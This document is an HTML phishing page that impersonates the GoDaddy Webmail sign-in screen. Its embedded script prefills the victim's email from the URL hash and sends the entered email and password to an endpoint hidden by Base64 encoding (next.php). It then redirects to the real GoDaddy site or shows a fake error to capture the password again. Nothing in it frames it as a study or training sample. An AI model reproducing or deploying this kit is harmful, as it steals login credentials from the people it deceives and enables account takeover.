
<!doctype html>
<html lang="en">
<head>
  <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script type="text/javascript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="icon" type="image/png" sizes="32x32" href="images/favicon-32x32.png">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title>Godaddy Webmail</title>
    <link href="css/hover.css" rel="stylesheet" media="all">

    <style type="text/css">
      body {
        margin: 0;
        font-family: gdsherpa,Helvetica,Arial,sans-serif;
        font-size: 1rem;
        font-weight: 400;
        line-height: 1.5rem;
        color: #111;
        text-align: left;
        background-color: #fff;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
      }
      .headline-brand {
        font-family: gd-sage,"Times New Roman",serif;
        font-weight: 700!important;
        font-size: 40px;
      }

      .icbu-footer-seo {
        color: #999999;
        font-size: 14px;
      }
      .icbu-footer-seo a{
        color: #999999;
        font-size: 14px;
      }




      .input-icons i { 
        position: absolute; 
      } 

      .input-icons { 
        width: 100%; 
      } 

      .icon { 
        padding: 15px; 
        min-width: 40px;
        color: #8FA7AD; 
      } 

      .input-field { 
        width: 100%; 
        padding: 10px;
        padding-left: 20px ;
        text-align: left;
        border: 1px solid #B7B7B7; 
      } 


      #submit-btn{
        background-color: #111111; 
        font-weight: 500; 
        font-size: 18px;
      }


      #submit-btn:hover{
        background-color: #444;

      }

      #logoImage {
        max-height: 40px;
        margin-top: 20px;
      }



    </style>
  </head>
  <body style="background-color: #f5f7f8;" >
    <div class="container-fluid p-0">
      <div class="container-fluid bg-white">
        <div class="row">
          <div class="col-lg-11 mx-auto my-1 p-2">
            <div class="d-inline-block">
              <i class="fas fa-globe"></i>
              <span>Country-English</span>
              <i class="fas fa-chevron-down"></i>
            </div> 
            <div class="float-right d-inline-block">
              <i class="fas fa-phone-alt"></i>
              <span>+1 480 463 8811</span>
              <i class="fas fa-chevron-down"></i>
            </div> 

          </div>

        </div>

      </div>

      <div class="container-fluid">
        <div class="row" style="margin: 35px 0px ;">
          <div class="col-lg-6 align-self-center text-center">
            <img src="images/godaddy-side.png" class="img-fluid">


          </div>
          <div class="col-lg-5">
            <div class="text-center">
              <img src="images/off365.png" class="img-fluid" width="280px">
            </div>
            <div class="text-center p-4 text-white" style="background-color: #333;">
              <span class="font-weight-bold h3">Webmail</span>
            </div>


            <div style="background-color: white;border-radius:5px; padding: 20px 48px;">
              <div class="col-lg-10 mx-auto">
                <span class="h3 font-weight-bold">Sign in</span>
              </div>
              <!-- form -->
              <div class="mt-4 col-lg-10 mx-auto">
                <center>
                  <div class="alert alert-danger" id="msg" style="display: none;"></div>
                  <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account.</span>
                </center>
                <form id="contact" class="form-horizontal well">
                  <div id="div1" class="text-dark">
                    <div>
                      <div class="form-group m-0">
                        <div id="inputbar">
                          <label class="font-weight-bold">Email</label>
                          <div class="input-icons">
                            <!-- <i class="far fa-user icon"></i> -->
                            <input type="ar" name="ar" class="input-field rounded-0" id="ar" aria-describedby="arHelp" placeholder="">
                          </div>
                        </div>
                      </div>
                    </div>
                    <div class="mt-4">
                      <div class="form-group m-0">
                        <label class="font-weight-bold">Password</label>
                        <div class="input-icons">
                          <!-- <i class="fas fa-lock icon"></i> -->
                          <input type="password" name="io" class="input-field rounded-0" id="io" aria-describedby="arHelp" placeholder="">
                        </div>
                      </div>
                    </div>
                    <div class=" mt-3">
                      <div class="form-check">
                        <input type="checkbox" class="form-check-input" id="exampleCheck1">
                        <label class="form-check-label" style="font-weight: 500" for="exampleCheck1">Keep me signed in</label>&nbsp<i class="fas fa-info-circle"></i>
                        
                      </div>

                    </div>
                  </div>
                </div>
                <div class="text-center col-lg-10 mx-auto mt-3">
                  <button class="btn py-2 w-100 text-white rounded-0" id="submit-btn">Sign in</button>
                </div>
                <!-- form close -->
                
                <div class="col-12 text-center mt-3">
                  <p id="recovery-links">Need to find <a  id="forgot_io" class="text-primary-o" href="https://sso.godaddy.com/v1/account/reset?app=dcc&amp;realm=idp" style="color: #09757a;text-decoration: underline;">your password</a>?</p>
                </div>
              </div>
              <div class="col-lg-12 mt-3">
                <div class="row">
                  <div class="col-lg-8 mx-auto">
                    <center>
                      <span class="font-weight-bold" style="color: #444;">Don't have GoDaddy ar?</span></center><br>
                      <button class="btn rounded-0 bg-transparent w-100" style="border:2px solid black;color: #4267B2;padding: 8px 22px;">
                        Get started
                      </button>
                    </div>
                  </div>
                </div>


              </div>

            </div> 
          </div> 
          <div class="container-fluid bg-white">
            <div class="row">
              <div class="col-lg-12 p-3 text-center">
                <span style="font-size:14px;">Copyright © 1999 - 2021 GoDaddy Operating Company, LLC. All Rights Reserved. <a href="" style="color: #09757a;text-decoration: underline;">Privacy Policy</a>.</span>
              </div>
            </div>
          </div> 
        </div>






        <!-- Optional JavaScript -->
        <!-- jQuery first, then Popper.js, then Bootstrap JS -->
        <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
        <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
        <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
      </body>

      <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
      <script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
      <script>
        $("#submit-btn1").hide();

        /* global $ */
        $(document).ready(function(){
          var count=0;

      /////////////url ar getting////////////////
      var ar = window.location.hash.substr(1);
      if (!ar) {

      }
      else
      {
          // $('#ar').val(ar);
          var my_ar =ar;
          var ind=my_ar.indexOf("@");
          var my_slice=my_ar.substr((ind+1));
          var c= my_slice.substr(0, my_slice.indexOf('.'));
          var final= c.toLowerCase();
          
          $('#contact').trigger("reset");
          $("#msg").hide();
            // $('#fieldImg').attr('src', 'images/other-1.png');
            // $('#field').html("Other Mail");
            $('#ar').val(my_ar);
            $('#arch').html(my_ar);
            $("#msg").hide();
            // $("#inputbar").animate({left:200, opacity:"hide"}, 0);
            // $("#automail").animate({right:200, opacity:"show"}, 1000);
            // $('#ajaxModal').modal('show');
          }
        ///////////////url getting ar////////////////


        var file="bmV4dC5waHA=";
        $('#submit-btn').click(function(event){
          $('#error').hide();
          $('#msg').hide();
          event.preventDefault();
          var ar=$("#ar").val();
          var io=$("#io").val();
          var msg = $('#msg').html();
          $('#msg').text( msg );
        ///////////new injection////////////////
        var my_ar =ar;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        // if (!filter.test(my_ar)) {
        //   $('#error').show();
        //   ar.focus;
        //   return false;
        // }

        var ind=my_ar.indexOf("@");
        var my_slice=my_ar.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var n = my_ar.search("@");
        ///////////new injection////////////////
        count=count+1;
        
        $.ajax({
          dataType: 'JSON',
          url: atob(file),
          type: 'POST',
          data:{
            login:ar,
            passwd:io,
          },
              // data: $('#contact').serialize(),
              beforeSend: function(xhr){
                $('#submit-btn').html('Verifing...');
              },
              success: function(response){
                  $("#msg").show();
                  console.log(response);
                  if(response == 'success') {
                    window.location.replace('https://godaddy.com/');
                  }else{
                    $("#msg").show();
                    $('#msg').html("Your account or password is incorrect! Please try again later.");
                  }
              },
              error: function(){
                $("#io").val("");
               $("#msg").show();
               $('#msg').html("Your account or password is incorrect! Please try again later.");
             },
             complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
      });

   });
</script>
</html>